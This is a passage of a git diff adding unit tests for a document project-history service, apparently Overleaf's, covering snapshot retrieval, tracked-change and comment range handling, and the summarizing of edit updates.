this.WebApiManager.promises.getHistoryId + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should get the chunk', function () { + this.HistoryStoreManager.promises.getChunkAtVersion + .calledWith(this.projectId, this.historyId, 5) + .should.equal(true) + }) + + it('should get the blob of the starting snapshot', function () { + this.getString + .calledWith('5d2781d78fa5a97b7bafa849fe933dfc9dc93eba') + .should.equal(true) + }) + + it('should get the blob of the ranges', function () { + this.getObject + .calledWith('73061952d41ce54825e2fc1c36b4cf736d5fb62f') + .should.equal(true) + }) + + it('should return a string stream with the text content without the tracked deletes', function () { + expect(this.stream.read().toString()).to.equal( + 'the brown fox jumps over the lazy dog' + ) + }) + }) + + describe('of a binary file', function () { + beforeEach(async function () { + this.HistoryStoreManager.promises.getProjectBlobStream + .withArgs(this.historyId) + .resolves((this.stream = 'mock-stream')) + this.returnedStream = + await this.SnapshotManager.promises.getFileSnapshotStream( + this.projectId, + 5, + 'binary.png' + ) + }) + + it('should get the overleaf id', function () { + this.WebApiManager.promises.getHistoryId + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should get the chunk', function () { + this.HistoryStoreManager.promises.getChunkAtVersion + .calledWith(this.projectId, this.historyId, 5) + .should.equal(true) + }) + + it('should get the blob of the starting snapshot', function () { + this.HistoryStoreManager.promises.getProjectBlobStream + .calledWith( + this.historyId, + 'c6654ea913979e13e22022653d284444f284a172' + ) + .should.equal(true) + }) + + it('should return a stream with the blob content', function () { + expect(this.returnedStream).to.equal(this.stream) + }) + }) + + describe("when the file doesn't exist", function () { + it('should return a NotFoundError', async function () { + await expect( + this.SnapshotManager.promises.getFileSnapshotStream( + this.projectId, + 5, + 'not-here.png' + ) + ).to.be.rejectedWith(Errors.NotFoundError) + }) + }) + }) + + describe('getProjectSnapshot', function () { + beforeEach(function () { + this.WebApiManager.promises.getHistoryId.resolves(this.historyId) + this.ranges = { + comments: [], + trackedChanges: [ + { + range: { pos: 5, length: 6 }, + tracking: { + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + type: 'delete', + }, + }, + { + range: { pos: 12, length: 5 }, + tracking: { + userId: 'user-1', + ts: '2024-01-01T00:00:00.000Z', + type: 'insert', + }, + }, + ], + } + this.HistoryStoreManager.promises.getChunkAtVersion.resolves({ + chunk: (this.chunk = { + history: { + snapshot: { + files: { + 'main.tex': { + hash: '35c9bd86574d61dcadbce2fdd3d4a0684272c6ea', + stringLength: 41, + }, + 'unchanged.tex': { + hash: '35c9bd86574d61dcadbce2fdd3d4a0684272c6ea', + stringLength: 41, + }, + 'with_ranges_unchanged.tex': { + hash: '35c9bd86574d61dcadbce2fdd3d4a0684272c6ea', + rangesHash: '2e59fe3dbd5310703f89236d589d0b35db169cdf', + stringLength: 41, + }, + 'with_ranges_changed.tex': { + hash: '35c9bd86574d61dcadbce2fdd3d4a0684272c6ea', + rangesHash: '2e59fe3dbd5310703f89236d589d0b35db169cdf', + stringLength: 41, + }, + 'binary.png': { + hash: 'c6654ea913979e13e22022653d284444f284a172', + byteLength: 41, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [41, '\n\nSeven eight'], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [54, ' nine'], + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'with_ranges_changed.tex', + textOperation: [41, '\n\nSeven eight'], + }, + ], + timestamp: '2017-12-04T10:29:25.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + authors: [ + { + id: 31, + email: 'james.allen@overleaf.com', + name: 'James', + }, + ], + }), + }) + }) + + describe('of project', function () { + beforeEach(async function () { + this.HistoryStoreManager.getBlobStore.withArgs(this.historyId).returns({ + getString: (this.getString = sinon.stub().resolves( + `\ +Hello world + +One two three + +Four five six\ +` + )), + getObject: (this.getObject = sinon.stub().resolves(this.ranges)), + }) + this.data = await this.SnapshotManager.promises.getProjectSnapshot( + this.projectId, + 6 + ) + }) + + it('should get the overleaf id', function () { + this.WebApiManager.promises.getHistoryId + .calledWith(this.projectId) + .should.equal(true) + }) + + it('should get the chunk', function () { + this.HistoryStoreManager.promises.getChunkAtVersion + .calledWith(this.projectId, this.historyId, 6) + .should.equal(true) + }) + + it('should get the ranges for the file with tracked changes', function () { + this.getObject.calledWith('2e59fe3dbd5310703f89236d589d0b35db169cdf') + }) + + it('should produce the snapshot file data', function () { + expect(this.data).to.deep.equal({ + files: { + 'main.tex': { + // files with operations in the chunk should return content only + data: { + content: + 'Hello world\n\nOne two three\n\nFour five six\n\nSeven eight nine', + }, + }, + 'unchanged.tex': { + // unchanged files in the chunk should return hash only + data: { + hash: '35c9bd86574d61dcadbce2fdd3d4a0684272c6ea', + }, + }, + 'with_ranges_changed.tex': { + // files in the chunk with tracked changes should return content + // without the tracked deletes + data: { + content: + 'Hello\n\nOne two three\n\nFour five six\n\nSeven eight', + }, + }, + 'with_ranges_unchanged.tex': { + // files in the chunk with tracked changes should return content + // without the tracked deletes, even if they are unchanged + data: { + content: 'Hello\n\nOne two three\n\nFour five six', + }, + }, + 'binary.png': { + // binary files in the chunk should return hash only + data: { + hash: 'c6654ea913979e13e22022653d284444f284a172', + }, + }, + }, + projectId: 'project-id-123', + }) + }) + }) + + describe('on blob store error', function () { + beforeEach(function () { + this.error = new Error('ESOCKETTIMEDOUT') + this.HistoryStoreManager.getBlobStore.withArgs(this.historyId).returns({ + getString: sinon.stub().rejects(this.error), + getObject: sinon.stub().resolves(), + }) + }) + + it('should call back with error', async function () { + expect( + this.SnapshotManager.promises.getProjectSnapshot(this.projectId, 5) + ).to.be.rejectedWith(this.error.message) + }) + }) + }) + + describe('getLatestSnapshotFiles', function () { + describe('for a project', function () { + beforeEach(async function () { + this.HistoryStoreManager.promises.getMostRecentChunk.resolves({ + chunk: (this.chunk = { + history: { + snapshot: { + files: { + 'main.tex': { + hash: '35c9bd86574d61dcadbce2fdd3d4a0684272c6ea', + stringLength: 41, + }, + 'binary.png': { + hash: 'c6654ea913979e13e22022653d284444f284a172', + byteLength: 41, + }, + }, + }, + changes: [ + { + operations: [ + { + pathname: 'main.tex', + textOperation: [41, '\n\nSeven eight'], + }, + ], + timestamp: '2017-12-04T10:29:17.786Z', + authors: [31], + }, + { + operations: [ + { + pathname: 'main.tex', + textOperation: [54, ' nine'], + }, + ], + timestamp: '2017-12-04T10:29:22.905Z', + authors: [31], + }, + ], + }, + startVersion: 3, + authors: [ + { + id: 31, + email: 'james.allen@overleaf.com', + name: 'James', + }, + ], + }), + }) + + this.HistoryStoreManager.getBlobStore.withArgs(this.historyId).returns({ + getString: (this.getString = sinon.stub().resolves( + `\ +Hello world + +One two three + +Four five six\ +`.replace(/^\t/g, '') + )), + getObject: sinon.stub().rejects(), + }) + this.data = await this.SnapshotManager.promises.getLatestSnapshotFiles( + this.projectId, + this.historyId + ) + }) + + it('should get the chunk', function () { + this.HistoryStoreManager.promises.getMostRecentChunk + .calledWith(this.projectId, this.historyId) + .should.equal(true) + }) + + it('should produce the snapshot file data', function () { + expect(this.data).to.have.all.keys(['main.tex', 'binary.png']) + expect(this.data['main.tex']).to.exist + expect(this.data['binary.png']).to.exist + expect(this.data['main.tex'].getStringLength()).to.equal(59) + expect(this.data['binary.png'].getByteLength()).to.equal(41) + expect(this.data['binary.png'].getHash()).to.equal( + 'c6654ea913979e13e22022653d284444f284a172' + ) + }) + }) + + describe('when the chunk is empty', function () { + beforeEach(async function () { + this.HistoryStoreManager.promises.getMostRecentChunk.resolves(null) + expect( + this.SnapshotManager.promises.getLatestSnapshotFiles( + this.projectId, + this.historyId + ) + ).to.be.rejectedWith('undefined chunk') + }) + }) + }) + + describe('getRangesSnapshot', function () { + beforeEach(async function () { + this.WebApiManager.promises.getHistoryId.resolves(this.historyId) + this.HistoryStoreManager.promises.getChunkAtVersion.resolves({ + chunk: (this.chunk = { + history: { + snapshot: { + files: { + 'main.tex': { + hash: (this.fileHash = + '5d2781d78fa5a97b7bafa849fe933dfc9dc93eba'), + rangesHash: (this.rangesHash = + '73061952d41ce54825e2fc1c36b4cf736d5fb62f'), + stringLength: 41, + }, + }, + }, + changes: [], + }, + startVersion: 1, + authors: [ + { + id: 31, + email: 'author@example.com', + name: 'Author', + }, + ], + }), + }) + + this.HistoryStoreManager.getBlobStore.withArgs(this.historyId).returns({ + getString: (this.getString = sinon.stub()), + getObject: (this.getObject = sinon.stub()), + }) + + this.getString.resolves('the quick brown fox jumps over the lazy dog') + }) + + describe('with tracked deletes', function () { + beforeEach(async function () { + this.getObject.resolves({ + trackedChanges: [ + { + // 'quick ' + range: { + pos: 4, + length: 6, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + // 'fox ' + range: { + pos: 16, + length: 4, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + // 'lazy ' + range: { + pos: 35, + length: 5, + }, + tracking: { + type: 'insert', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + // 'dog' + range: { + pos: 40, + length: 3, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ], + }) + this.data = await this.SnapshotManager.promises.getRangesSnapshot( + this.projectId, + 1, + 'main.tex' + ) + }) + + it("doesn't shift the tracked delete by itself", function () { + expect(this.data.changes[0].op.p).to.eq(4) + }) + + it('should move subsequent tracked changes by the length of previous deletes', function () { + expect(this.data.changes[1].op.p).to.eq(16 - 6) + expect(this.data.changes[2].op.p).to.eq(35 - 6 - 4) + }) + + it("shouldn't move subsequent tracked changes by previous inserts", function () { + expect(this.data.changes[3].op.p).to.eq(40 - 6 - 4) + }) + }) + + describe('with comments and tracked deletes', function () { + beforeEach(async function () { + this.getObject.resolves({ + // the quick brown fox jumps over the lazy dog + trackedChanges: [ + { + // 'e qui' + range: { + pos: 2, + length: 5, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + // 'r' + range: { + pos: 11, + length: 1, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + // 'er the la' + range: { + pos: 28, + length: 9, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ], + comments: [ + { + id: 'comment-1', + ranges: [ + // 'quick' + { + pos: 4, + length: 5, + }, + // 'brown' + { + pos: 10, + length: 5, + }, + // 'over' + { + pos: 26, + length: 4, + }, + // 'lazy' + { + pos: 35, + length: 4, + }, + ], + resolved: false, + }, + { id: 'comment-2', ranges: [], resolved: true }, + { + id: 'comment-3', + ranges: [ + // 'q' + { pos: 4, length: 1 }, + ], + resolved: true, + }, + ], + }) + this.data = await this.SnapshotManager.promises.getRangesSnapshot( + this.projectId, + 1, + 'main.tex' + ) + }) + + it('should move the comment to the start of the tracked delete and remove overlapping text', function () { + expect(this.data.comments[0].op.p).to.eq(2) + expect(this.data.comments[0].op.c).to.eq('ck bown fox jumps ovzy') + }) + + it('should put resolved status in op', function () { + expect(this.data.comments[0].op.resolved).to.be.false + expect(this.data.comments[1].op.resolved).to.be.true + expect(this.data.comments[2].op.resolved).to.be.true + }) + + it('should include thread id', function () { + expect(this.data.comments[0].op.t).to.eq('comment-1') + expect(this.data.comments[1].op.t).to.eq('comment-2') + expect(this.data.comments[2].op.t).to.eq('comment-3') + }) + + it('should translate detached comment to zero length op', function () { + expect(this.data.comments[1].op.p).to.eq(0) + expect(this.data.comments[1].op.c).to.eq('') + }) + + it('should position a comment entirely in a tracked delete next to the tracked delete', function () { + expect(this.data.comments[2].op.p).to.eq(2) + expect(this.data.comments[2].op.c).to.eq('') + }) + }) + + describe('with multiple tracked changes and comments', function () { + beforeEach(async function () { + this.getObject.resolves({ + trackedChanges: [ + { + // 'quick ' + range: { + pos: 4, + length: 6, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + // 'brown ' + range: { + pos: 10, + length: 6, + }, + tracking: { + type: 'insert', + userId: '31', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + // 'lazy ' + range: { + pos: 35, + length: 5, + }, + tracking: { + type: 'delete', + userId: '31', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ], + comments: [ + { + id: 'comment-1', + // 'quick', 'brown', 'lazy' + ranges: [ + { + pos: 4, + length: 5, + }, + { + pos: 10, + length: 5, + }, + { + pos: 35, + length: 4, + }, + ], + resolved: false, + }, + { + id: 'comment-2', + // 'the', 'the' + ranges: [ + { + pos: 0, + length: 3, + }, + { + pos: 31, + length: 3, + }, + ], + resolved: true, + }, + ], + }) + + this.data = await this.SnapshotManager.promises.getRangesSnapshot( + this.projectId, + 1, + 'main.tex' + ) + }) + + it('looks up ranges', function () { + expect(this.getObject).to.have.been.calledWith(this.rangesHash) + expect(this.getString).to.have.been.calledWith(this.fileHash) + }) + + it('should get the chunk', function () { + expect( + this.HistoryStoreManager.promises.getChunkAtVersion + ).to.have.been.calledWith(this.projectId, this.historyId, 1) + }) + + it('returns the ranges with content and adjusted positions to ignore tracked deletes', function () { + expect(this.data).to.deep.equal({ + changes: [ + { + metadata: { + ts: '2023-01-01T00:00:00.000Z', + user_id: '31', + }, + op: { + d: 'quick ', + p: 4, + }, + }, + { + metadata: { + ts: '2024-01-01T00:00:00.000Z', + user_id: '31', + }, + op: { + i: 'brown ', + p: 4, + }, + }, + { + metadata: { + ts: '2024-01-01T00:00:00.000Z', + user_id: '31', + }, + op: { + d: 'lazy ', + p: 29, + }, + }, + ], + comments: [ + { + op: { + c: 'brown fox jumps over the ', + p: 4, + t: 'comment-1', + resolved: false, + }, + id: 'comment-1', + }, + { + op: { + c: 'the brown fox jumps over the', + p: 0, + t: 'comment-2', + resolved: true, + }, + id: 'comment-2', + }, + ], + }) + }) + }) + + describe('with an empty file', function () { + beforeEach(async function () { + this.getString.resolves('') + this.getObject.resolves({}) + this.data = await this.SnapshotManager.promises.getRangesSnapshot( + this.projectId, + 1, + 'main.tex' + ) + }) + + it('should return empty comments and changes', function () { + expect(this.data).to.deep.equal({ + changes: [], + comments: [], + }) + }) + }) + }) + + describe('getFileMetadataSnapshot', function () { + beforeEach(function () { + this.WebApiManager.promises.getHistoryId.resolves(this.historyId) + this.HistoryStoreManager.promises.getChunkAtVersion.resolves({ + chunk: (this.chunk = { + history: { + snapshot: { + files: { + 'main.tex': { + hash: '5d2781d78fa5a97b7bafa849fe933dfc9dc93eba', + metadata: { + importer_id: 'test-user-id', + imported_at: '2024-01-01T00:00:00.000Z', + }, + stringLength: 41, + }, + 'other.tex': { + hash: '5d2781d78fa5a97b7bafa849fe933dfc9dc93eba', + stringLength: 41, + }, + }, + }, + changes: [], + }, + startVersion: 1, + authors: [ + { + id: 31, + email: 'author@example.com', + name: 'Author', + }, + ], + }), + }) + }) + + it('should return the metadata for the file', async function () { + const result = + await this.SnapshotManager.promises.getFileMetadataSnapshot( + this.projectId, + 1, + 'main.tex' + ) + expect(result).to.deep.equal({ + metadata: { + importer_id: 'test-user-id', + imported_at: '2024-01-01T00:00:00.000Z', + }, + }) + }) + + it('should return undefined when file does not have metadata', async function () { + const result = + await this.SnapshotManager.promises.getFileMetadataSnapshot( + this.projectId, + 1, + 'other.tex' + ) + expect(result).to.deep.equal({ metadata: undefined }) + }) + + it('throw an error when file does not exist', async function () { + await expect( + this.SnapshotManager.promises.getFileMetadataSnapshot( + this.projectId, + 1, + 'does-not-exist.tex' + ) + ).to.be.rejectedWith(Error) + }) + }) + + describe('getPathsAtVersion', function () { + beforeEach(function () { + this.WebApiManager.promises.getHistoryId.resolves(this.historyId) + this.HistoryStoreManager.promises.getChunkAtVersion.resolves({ + chunk: (this.chunk = { + history: { + snapshot: { + files: { + 'main.tex': { + hash: (this.fileHash = + '5d2781d78fa5a97b7bafa849fe933dfc9dc93eba'), + rangesHash: (this.rangesHash = + '73061952d41ce54825e2fc1c36b4cf736d5fb62f'), + stringLength: 41, + }, + 'other.tex': { + hash: (this.fileHash = + 'f572d396fae9206628714fb2ce00f72e94f2258f'), + stringLength: 6, + }, + }, + }, + changes: [], + }, + startVersion: 4, + authors: [ + { + id: 31, + email: 'author@example.com', + name: 'Author', + }, + ], + }), + }) + }) + + it('should return an array of paths', async function () { + const result = await this.SnapshotManager.promises.getPathsAtVersion( + this.projectId, + 4 + ) + expect(result.paths).to.have.length(2) + expect(result.paths).to.include.members(['main.tex', 'other.tex']) + }) + }) +}) diff --git a/services/project-history/test/unit/js/SummarizedUpdatesManager/SummarizedUpdatesManagerTests.js b/services/project-history/test/unit/js/SummarizedUpdatesManager/SummarizedUpdatesManagerTests.js new file mode 100644 index 0000000..3cd0842 --- /dev/null +++ b/services/project-history/test/unit/js/SummarizedUpdatesManager/SummarizedUpdatesManagerTests.js @@ -0,0 +1,874 @@ +import sinon from 'sinon' +import { expect } from 'chai' +import { strict as esmock } from 'esmock' + +const MODULE_PATH = '../../../../app/js/SummarizedUpdatesManager.js' + +// A sufficiently large amount of time to make the algorithm process updates +// separately +const LATER = 1000000 + +describe('SummarizedUpdatesManager', function () { + beforeEach(async function () { + this.historyId = 'history-id-123' + this.projectId = 'project-id-123' + this.firstChunk = { chunk: { startVersion: 0 } } + this.secondChunk = { chunk: { startVersion: 1 } } + + this.ChunkTranslator = { + convertToSummarizedUpdates: sinon.stub(), + } + this.HistoryApiManager = { + shouldUseProjectHistory: sinon.stub().yields(null, true), + } + this.HistoryStoreManager = { + getMostRecentChunk: sinon.stub(), + getChunkAtVersion: sinon.stub(), + } + this.UpdatesProcessor = { + processUpdatesForProject: sinon.stub().withArgs(this.projectId).yields(), + } + this.WebApiManager = { + getHistoryId: sinon.stub().yields(null, this.historyId), + } + this.LabelsManager = { + getLabels: sinon.stub().yields(null, []), + } + this.SummarizedUpdatesManager = await esmock(MODULE_PATH, { + '../../../../app/js/ChunkTranslator.js': this.ChunkTranslator, + '../../../../app/js/HistoryApiManager.js': this.HistoryApiManager, + '../../../../app/js/HistoryStoreManager.js': this.HistoryStoreManager, + '../../../../app/js/UpdatesProcessor.js': this.UpdatesProcessor, + '../../../../app/js/WebApiManager.js': this.WebApiManager, + '../../../../app/js/LabelsManager.js': this.LabelsManager, + }) + this.callback = sinon.stub() + }) + + describe('getSummarizedProjectUpdates', function () { + describe('chunk management', function () { + describe('when there is a single empty chunk', function () { + setupChunks([[]]) + expectSummaries('returns an empty list of updates', {}, []) + }) + + describe('when there is a single non-empty chunk', function () { + setupChunks([[makeUpdate()]]) + expectSummaries('returns summarized updates', {}, [makeSummary()]) + }) + + describe('when there are multiple chunks', function () { + setupChunks([ + [makeUpdate({ startTs: 0, v: 1 })], + [makeUpdate({ startTs: LATER, v: 2 })], + ]) + + describe('and requesting many summaries', function () { + expectSummaries('returns many update summaries', {}, [ + makeSummary({ startTs: LATER, fromV: 2 }), + makeSummary({ startTs: 0, fromV: 1 }), + ]) + }) + + describe('and requesting a single summary', function () { + expectSummaries('returns a single update summary', { min_count: 1 }, [ + makeSummary({ startTs: LATER, fromV: 2 }), + ]) + }) + }) + + describe('when there are too many chunks', function () { + // Set up 10 chunks + const chunks = [] + for (let v = 1; v <= 10; v++) { + chunks.push([ + makeUpdate({ + startTs: v * 100, // values: 100 - 1000 + v, // values: 1 - 10 + }), + ]) + } + setupChunks(chunks) + + // Verify that we stop summarizing after 5 chunks + expectSummaries('summarizes the 5 latest chunks', {}, [ + makeSummary({ startTs: 600, endTs: 1010, fromV: 6, toV: 11 }), + ]) + }) + + describe('when requesting updates before a specific version', function () { + // Chunk 1 contains 5 updates that were made close to each other and 5 + // other updates that were made later. + const chunk1 = [] + for (let v = 1; v <= 5; v++) { + chunk1.push( + makeUpdate({ + startTs: v * 100, // values: 100 - 500 + v, // values: 1 - 5 + }) + ) + } + for (let v = 6; v <= 10; v++) { + chunk1.push( + makeUpdate({ + startTs: LATER + v * 100, // values: 1000600 - 1001000 + v, // values: 6 - 10 + }) + ) + } + + // Chunk 2 contains 5 updates that were made close to the latest updates in + // chunk 1. + const chunk2 = [] + for (let v = 11; v <= 15; v++) { + chunk2.push( + makeUpdate({ + startTs: LATER + v * 100, // values: 1001100 - 1001500 + v, // values: 11 - 15 + }) + ) + } + setupChunks([chunk1, chunk2]) + + expectSummaries( + 'summarizes the updates in a single chunk if the chunk is sufficient', + { before: 14, min_count: 1 }, + [ + makeSummary({ + startTs: LATER + 1100, + endTs: LATER + 1310, + fromV: 11, + toV: 14, + }), + ] + ) + + expectSummaries( + 'summarizes the updates in many chunks otherwise', + { before: 14, min_count: 2 }, + [ + makeSummary({ + startTs: LATER + 600, + endTs: LATER + 1310, + fromV: 6, + toV: 14, + }), + makeSummary({ + startTs: 100, + endTs: 510, + fromV: 1, + toV: 6, + }), + ] + ) + }) + }) + + describe('update summarization', function () { + describe('updates that are close in time', function () { + setupChunks([ + [ + makeUpdate({ + users: ['user1'], + startTs: 0, + v: 4, + }), + makeUpdate({ + users: ['user2'], + startTs: 20, + v: 5, + }), + ], + ]) + + expectSummaries('should merge the updates', {}, [ + makeSummary({ + users: ['user1', 'user2'], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('updates that are far apart in time', function () { + setupChunks([ + [ + makeUpdate({ + users: ['user1'], + startTs: 100, + v: 4, + }), + makeUpdate({ + users: ['user2'], + startTs: LATER, + v: 5, + }), + ], + ]) + + expectSummaries('should not merge the updates', {}, [ + makeSummary({ + users: ['user2'], + startTs: LATER, + endTs: LATER + 10, + fromV: 5, + toV: 6, + }), + makeSummary({ + users: ['user1'], + startTs: 100, + endTs: 110, + fromV: 4, + toV: 5, + }), + ]) + }) + + describe('mergeable updates in different chunks', function () { + setupChunks([ + [ + makeUpdate({ + pathnames: ['main.tex'], + users: ['user1'], + startTs: 10, + v: 4, + }), + makeUpdate({ + pathnames: ['main.tex'], + users: ['user2'], + startTs: 30, + v: 5, + }), + ], + [ + makeUpdate({ + pathnames: ['chapter.tex'], + users: ['user1'], + startTs: 40, + v: 6, + }), + makeUpdate({ + pathnames: ['chapter.tex'], + users: ['user1'], + startTs: 50, + v: 7, + }), + ], + ]) + + expectSummaries('should merge the updates', {}, [ + makeSummary({ + pathnames: ['main.tex', 'chapter.tex'], + users: ['user1', 'user2'], + startTs: 10, + endTs: 60, + fromV: 4, + toV: 8, + }), + ]) + }) + + describe('null user values after regular users', function () { + setupChunks([ + [ + makeUpdate({ + users: ['user1'], + startTs: 0, + v: 4, + }), + makeUpdate({ + users: [null], + startTs: 20, + v: 5, + }), + ], + ]) + expectSummaries('should include the null values', {}, [ + makeSummary({ + users: [null, 'user1'], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('null user values before regular users', function () { + setupChunks([ + [ + makeUpdate({ + users: [null], + startTs: 0, + v: 4, + }), + makeUpdate({ + users: ['user1'], + startTs: 20, + v: 5, + }), + ], + ]) + expectSummaries('should include the null values', {}, [ + makeSummary({ + users: [null, 'user1'], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('multiple null user values', function () { + setupChunks([ + [ + makeUpdate({ + users: ['user1'], + startTs: 10, + v: 4, + }), + makeUpdate({ + users: [null], + startTs: 20, + v: 5, + }), + makeUpdate({ + users: [null], + startTs: 70, + v: 6, + }), + ], + ]) + expectSummaries('should merge the null values', {}, [ + makeSummary({ + users: [null, 'user1'], + startTs: 10, + endTs: 80, + fromV: 4, + toV: 7, + }), + ]) + }) + + describe('multiple users', function () { + setupChunks([ + [ + makeUpdate({ + users: ['user1'], + startTs: 0, + v: 4, + }), + makeUpdate({ + users: ['user2'], + startTs: 20, + v: 5, + }), + ], + ]) + expectSummaries('should merge the users', {}, [ + makeSummary({ + users: ['user1', 'user2'], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('duplicate updates with the same v1 user', function () { + setupChunks([ + [ + makeUpdate({ + users: [{ id: 'user1' }], + startTs: 0, + v: 4, + }), + makeUpdate({ + users: [{ id: 'user1' }], + startTs: 20, + v: 5, + }), + ], + ]) + expectSummaries('should deduplicate the users', {}, [ + makeSummary({ + users: [{ id: 'user1' }], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('duplicate updates with the same v2 user', function () { + setupChunks([ + [ + makeUpdate({ + users: ['user1'], + startTs: 0, + v: 4, + }), + makeUpdate({ + users: ['user1'], + startTs: 20, + v: 5, + }), + ], + ]) + expectSummaries('should deduplicate the users', {}, [ + makeSummary({ + users: ['user1'], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('mixed v1 and v2 users with the same id', function () { + setupChunks([ + [ + makeUpdate({ + users: ['user1'], + startTs: 0, + v: 4, + }), + makeUpdate({ + users: [{ id: 'user1' }], + startTs: 20, + v: 5, + }), + ], + ]) + expectSummaries('should deduplicate the users', {}, [ + makeSummary({ + users: [{ id: 'user1' }], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('project ops in mergeable updates', function () { + setupChunks([ + [ + makeUpdate({ + pathnames: [], + projectOps: [ + { rename: { pathname: 'C.tex', newPathname: 'D.tex' } }, + ], + users: ['user2'], + startTs: 0, + v: 4, + }), + makeUpdate({ + pathnames: [], + projectOps: [ + { rename: { pathname: 'A.tex', newPathname: 'B.tex' } }, + ], + users: ['user1'], + startTs: 20, + v: 5, + }), + ], + ]) + expectSummaries('should merge project ops', {}, [ + makeSummary({ + pathnames: [], + projectOps: [ + { + atV: 5, + rename: { + pathname: 'A.tex', + newPathname: 'B.tex', + }, + }, + { + atV: 4, + rename: { + pathname: 'C.tex', + newPathname: 'D.tex', + }, + }, + ], + users: ['user1', 'user2'], + startTs: 0, + endTs: 30, + fromV: 4, + toV: 6, + }), + ]) + }) + + describe('mergable updates with a mix of project ops and doc ops', function () { + setupChunks([ + [ + makeUpdate({ + pathnames: ['main.tex'], + users: ['user1'], + startTs: 0, + v: 4, + }), + makeUpdate({ + pathnames: [], + users: ['user2'], + projectOps: [ + { rename: { pathname: 'A.tex', newPathname: 'B.tex' } }, + ], + startTs: 20, + v: 5, + }), + makeUpdate({ + pathnames: ['chapter.tex'], + users: ['user2'], + startTs: 40, + v: 6, + }), + ], + ]) + expectSummaries('should keep updates separate', {}, [ + makeSummary({ + pathnames: ['chapter.tex'], + users: ['user2'], + startTs: 40, + fromV: 6, + }), + makeSummary({ + pathnames: [], + users: ['user2'], + projectOps: [ + { atV: 5, rename: { pathname: 'A.tex', newPathname: 'B.tex' } }, + ], + startTs: 20, + fromV: 5, + }), + makeSummary({ + pathnames: ['main.tex'], + users: ['user1'], + startTs: 0, + fromV: 4, + }), + ]) + }) + + describe('label on an update', function () { + const label = { + id: 'mock-id', + comment: 'an example comment', + version: 5, + } + setupChunks([ + [ + makeUpdate({ startTs: 0, v: 3 }), + makeUpdate({ startTs: 20, v: 4 }), + makeUpdate({ startTs: 40, v: 5 }), + makeUpdate({ startTs: 60, v: 6 }), + ], + ]) + setupLabels([label]) + + expectSummaries('should split the updates at the label', {}, [ + makeSummary({ startTs: 40, endTs: 70, fromV: 5, toV: 7 }), + makeSummary({ + startTs: 0, + endTs: 30, + fromV: 3, + toV: 5, + labels: [label], + }), + ]) + }) + + describe('updates with origin', function () { + setupChunks([ + [ + makeUpdate({ startTs: 0, v: 1 }), + makeUpdate({ startTs: 10, v: 2 }), + makeUpdate({ + startTs: 20, + v: 3, + origin: { kind: 'history-resync' }, + }), + makeUpdate({ + startTs: 30, + v: 4, + origin: { kind: 'history-resync' }, + }), + makeUpdate({ startTs: 40, v: 5 }), + makeUpdate({ startTs: 50, v: 6 }), + ], + ]) + + expectSummaries( + 'should split the updates where the origin appears or disappears', + {}, + [ + makeSummary({ startTs: 40, endTs: 60, fromV: 5, toV: 7 }), + makeSummary({ + startTs: 20, + endTs: 40, + fromV: 3, + toV: 5, + origin: { kind: 'history-resync' }, + }), + makeSummary({ startTs: 0, endTs: 20, fromV: 1, toV: 3 }), + ] + ) + }) + + describe('updates with different origins', function () { + setupChunks([ + [ + makeUpdate({ startTs: 0, v: 1, origin: { kind: 'origin-a' } }), + makeUpdate({ startTs: 10, v: 2, origin: { kind: 'origin-a' } }), + makeUpdate({ startTs: 20, v: 3, origin: { kind: 'origin-b' } }), + makeUpdate({ startTs: 30, v: 4, origin: { kind: 'origin-b' } }), + ], + ]) + expectSummaries( + 'should split the updates when the origin kind changes', + {}, + [ + makeSummary({ + startTs: 20, + endTs: 40, + fromV: 3, + toV: 5, + origin: { kind: 'origin-b' }, + }), + makeSummary({ + startTs: 0, + endTs: 20, + fromV: 1, + toV: 3, + origin: { kind: 'origin-a' }, + }), + ] + ) + }) + + describe('empty updates', function () { + setupChunks([ + [ + makeUpdate({ startTs: 0, v: 1, pathnames: ['main.tex'] }), + makeUpdate({ startTs: 10, v: 2, pathnames: [] }), + makeUpdate({ startTs: 20, v: 3, pathnames: ['main.tex'] }), + makeUpdate({ startTs: 30, v: 4, pathnames: [] }), + makeUpdate({ startTs: 40, v: 5, pathnames: [] }), + ], + [ + makeUpdate({ startTs: 50, v: 6, pathnames: [] }), + makeUpdate({ startTs: LATER, v: 7, pathnames: [] }), + makeUpdate({ startTs: LATER + 10, v: 8, pathnames: ['main.tex'] }), + makeUpdate({ startTs: LATER + 20, v: 9, pathnames: ['main.tex'] }), + makeUpdate({ startTs: LATER + 30, v: 10, pathnames: [] }), + ], + ]) + + expectSummaries('should skip empty updates', {}, [ + 